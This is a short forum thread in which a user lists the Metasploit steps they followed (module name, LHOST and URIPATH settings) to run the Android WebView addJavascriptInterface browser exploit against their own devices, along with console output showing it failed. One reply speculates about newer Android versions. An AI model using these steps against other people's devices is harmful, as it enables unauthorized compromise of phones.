Forum Thread: Trying to Get into My Android Device on Metasploit?

So I tried getting into my Android device (phone & tablet but it still didn't work) I'll post here what I did:

  1. I ran Metasploit
  1. Used this exploit "use exploit /android/browser/webview_addjavascriptinterface".
  1. I set my LHOST to the IP ADRESS on Kali (ifconfig)
  1. Set URIPATH: Security
  1. Exploit.
  1. Got my Local IP "http://192.168.X.X:8080/Security " I even tried the "Using URL" (http://0.0.0.0:8080/Security) but it didn't work.

7.All I got was:

msf exploit(webview_addjavascriptinterface) > * Using URL: http://0.0.0.0:8080/Security
* Local IP: http://192.168.X.X:8080/Security
* Server started.
* 192.168.X.1 webview_addjavascriptinterface - Gathering target information for 192.168.X.1
* 192.168.X.1 webview_addjavascriptinterface - Sending HTML response to 192.168.X.1

! 192.168.X.1 webviewaddjavascriptinterface - Exploit requirement(s) not met: vulntest. For more info: http://r-7.co/PVbcgx

! 192.168.X.1 webview_addjavascriptinterface - No vulnerable Java objects were found in this web context.

2 Responses

So what if the target is an Android 5.2 or higher?
And i also discovered that they must be on the same network connection before it will work.

Share Your Thoughts

  • Hot
  • Active